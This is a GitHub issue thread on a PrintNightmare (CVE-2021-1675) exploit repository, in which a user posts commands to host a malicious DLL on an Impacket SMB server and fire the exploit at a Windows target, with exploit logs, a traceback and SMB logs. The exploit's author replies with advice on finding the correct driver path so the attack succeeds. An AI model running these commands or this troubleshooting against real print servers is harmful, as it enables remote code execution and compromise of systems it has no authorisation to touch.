cube0x0/CVE-2021-1675

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION

sunny0day opened this issue · 4 comments

Start SMB server with Impacket:
sudo examples/smbserver.py -smb2support -ts smb /xxx/PrintNightmare/smb

Run exploit:
python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\\10.33.69.214\smb\nightmare.dll' 'C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL'


Exploit log:

[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
[*] Executing \\10.33.69.214\smb\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
  File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.

SMB log:

[2021-07-05 12:31:44] [*] Disconnecting Share(1:smb)
[2021-07-05 12:31:44] [*] Closing down connection (10.33.48.25,58737)
[2021-07-05 12:31:44] [*] Remaining connections []
[2021-07-05 12:31:48] [*] Incoming connection (10.33.48.25,57754)
[2021-07-05 12:31:48] [*] AUTHENTICATE_MESSAGE (\,xxx)
[2021-07-05 12:31:48] [*] User xxx\ authenticated successfully
[2021-07-05 12:31:48] [*] :::00::aaaaaaaaaaaaaaaa
[2021-07-05 12:31:49] [*] Connecting Share(1:smb)

Wireshark screenshot:
[Screenshot: printnightmare-wireshark-share-mode-file-conflict]

Unimplemented dissector: SPOOLSS
Return code: Share mode on file conflict with open mode (0x00000020)

Is anyone familiar with this error?

Paste the full input and output, please.

@cube0x0 I've added details to the initial post.

C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL cannot be used. Remove it from the args and let the script find the correct path, or enumerate like below:

Get-PrinterDriver |select Path

Path
----
C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\mxdwdrv.dll

@cube0x0 for your information, this is the result without specifying a path:

python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\\10.33.69.214\smb\whatanightmare.dll'
[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[-] pDriverPath C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL, expected :\Windows\System32\DriverStore\FileRepository\.....
[-] Specify pDriverPath manually